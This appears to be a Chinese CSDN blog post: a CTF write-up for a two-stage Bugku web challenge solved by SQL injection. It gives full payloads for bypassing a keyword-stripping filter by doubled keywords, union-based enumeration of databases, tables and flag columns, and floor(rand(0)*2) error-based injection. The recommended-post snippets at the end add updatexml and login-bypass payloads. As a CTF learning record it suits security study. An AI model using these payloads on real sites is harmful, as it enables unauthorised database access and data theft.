SQL报错注入

最新推荐文章于 2023-06-10 21:16:25 发布
最新推荐文章于 2023-06-10 21:16:25 发布
阅读量242 收藏
点赞数
分类专栏: SQL CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39495209/article/details/81778357
版权
CTF 同时被 2 个专栏收录
6 篇文章 0 订阅
订阅专栏
SQL
4 篇文章 0 订阅
订阅专栏

快草了两个月的bugku-web类型的题,感觉基本web类型都有了一些大概的了解,当然比不上dalao的掌控雷电的操作,后面就是多玩一会python了,毕竟CTF中脚本不会写是真的硬伤。

这道题是web-150分的题,看了一下网上的WP不多,我也是找了一堆资料,看了看相似的体型才把这道题做的差不多。

题名:多次,网址链接

首先打开网页看到id这个参数,很经典的SQL注入。于是测试单引号过滤?id=1’,页面发生变化,猜测位查询语句为单引号闭合。

再次进行测试,?id=1′ or 1=1%23 ,发现并无变化。

猜测可能有WAF过滤,于是测试双重写or,?id=1′ oorr 1=1%23 ,测试发现页面改变

进行测试过滤,使用异或符号(^)搭配length函数开始测试。

如何判断是否过滤,例如union函数没有过滤,那么length(‘union’)=0是不成立的,即该语句布尔值为0,并且前面的查询语句布尔值恒等于1,1^0=1,1^1=0。则为1返回正常页面,不正常返回错误页面。
![]https://ssb6666.github.io/2018/08/17/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/4.png)
经测试:or,and,union,select被过滤。那么接下来就是常规测试。

?id=1%27 oorrder by 2%23,测试列数为2。(注意order里面的or)

爆数据库

?id=-1%27 uniounionn selecselectt 1,group_concat(schema_name) from infoorrmation_schema.schemata%23(坑点:information里面的or
![]https://ssb6666.github.io/2018/08/17/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/6.png)

爆表

?id=-1%27 uniounionn selecselectt 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x776562313030322d31(十六进制码为web1002-1)%23

爆出数据

?id=-1%27 uniounionn selecselectt 1,flag1 from flag1 %23

然后题目提示还有一个flag在下一关的地址。根据上面的操作,地址可能在address列里。

寻找下一关地址

?id=-1%27 uniounionn selecselectt 1,address from flag1 %23

找到下一关地址


OK,还是向上面的一样测试,发现还是单引号过滤。

发现还是有回显我们测试的语句,突然发现这个WAF过滤的有点奇怪,这个过滤了union

那我将union重写,发现直接不回显,可能是后端的专门对这种产生过滤。

因为还发现有报错产生,那么我就进行报错盲注测试。

盲注测试公式:union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

其中version()改成相应的注入语句。公式需要灵活变通,例如本题中的union被过滤,那么将语句改为or and连接的形式,并且适当添加相应的列数。Ps:盲注相关原理在文章末尾链接。

or (select 1 from(select count(),concat(0x23,(select schema_name from information_schema.schemata limit 1,1),0x23,floor(rand(0)2))x from information_schema.schemata group by x)a)%23

因为不能用union进行注入,所以改变一下形式使用or,就这个走了好多弯路,因为or只能使用1个跟1个比,否则将会出错Operand should contain 1 column(s) , 且(select count(*),concat(0x23,(select schema_name from information_schema.schemata limit 1,1),0x23,floor(rand(0)*2))x from information_schema.schemata group by x)这条语句将会产生一个虚拟表,你在虚拟表进行查询时需要起一个别名,我在这里起的a,于是报错爆来数据库,下面的操作跟第一关一样。

但是其中爆数据时产生了一些问题,说是子查询返回超过了一行但是猜测肯定是只有一行的,估计是出题人加了回车产生了换行。

解决方法:left((select flag2 from flag2),40),取前40个字符。

相关链接:

https://blog.csdn.net/qq_35544379/article/details/77453019

https://blog.csdn.net/he_and/article/details/80455884

http://wyb0.com/

两天时间全部花费在这个报错注入上,不过懂了好多SQL上的东西,也算是少有收获。

R1ght0us
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql报错注入
球球的博客
02-18 743
sql报错注入,floor报错注入,extractvalue报错注入,updatexml报错注入
SQL注入-报错注入
李二胖的博客
04-16 145
SQL注入-报错注入报错注入 报错注入 输入链接为: http://192.168.17.137/sql/Less-1/?id=1', 观察到会报错并且将错误输出到页面,判断可以使用报错注入方式。 执行 http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+获取当前数据库名称 获取user() http://192.168.17.137/sql/Less-
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
32-32.渗透测试SQL注入基于报错注入(上)
05-10
32-32.渗透测试SQL注入基于报错注入(上)
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
33-33.渗透测试渗透测试之SQL注入基于报错注入(下)
最新发布
05-10
渗透测试渗透测试之SQL注入基于报错注入(下)
SQL注入报错注入
Forget_liu的博客
06-10 1654
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
SQL注入之报错注入
qq_43348375的博客
04-01 511
sql注入报错注入
sql注入(6)报错注入
c10udz的博客
05-11 4996
[极客大挑战 2019]LoveSQL
qq_37301470的博客
11-12 533
万能密码登录成功没有发现flag 判断藏在数据库里 check.php?username=1' or '1'='1&password=123456' or '1'='1 登陆成功返回的密码 7a2d6a8fd56b61a79bba61ee8f5ad02c 直接开始联合注入 check.php?username=1' union select 1,2,3%23&password=1 check.php?username=1' union select 1,2,database()%23&
SQL注入中,注释#、 --+、 --%20、 %23到底是什么意思?sqli-labs-master
热门推荐
weixin_43096078的博客
08-25 2万+
1.# 和 -- (有个空格)表示注释,可以使它们后面的语句不被执行。在url中,如果是get请求**(记住是get请求,也就是我们在浏览器中输入的url)** ,解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用。所以,HTTP请求中不包括#,因此使用#闭合无法注释,会报错;而使用-- (有个空格),在传输过程中空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+会被解释成空格。 2.当然,也可以使用--%20,把空格转换为urlencode编码格式
一次贴近实战的CTF比赛(cookie欺骗、php函数、Tomcat漏洞、注入、逆向等)
渗透、攻防、CTF、编程
06-29 8515
19题170分 一、web安全-29 1.cookie欺骗(web登录)9 http://***.***.***.50:8040/admin/login.asp 解题思路: http://***.***.***.50:8151/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,passw...
sql报错注入读取文件
05-22
报错注入是一种常见的注入攻击技术,攻击者在构造SQL查询语句时,故意使用一些错误的语法或者参数,从而导致数据库执行错误,返回错误信息。 如果攻击者成功利用报错注入技术读取了数据库中的敏感信息,比如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值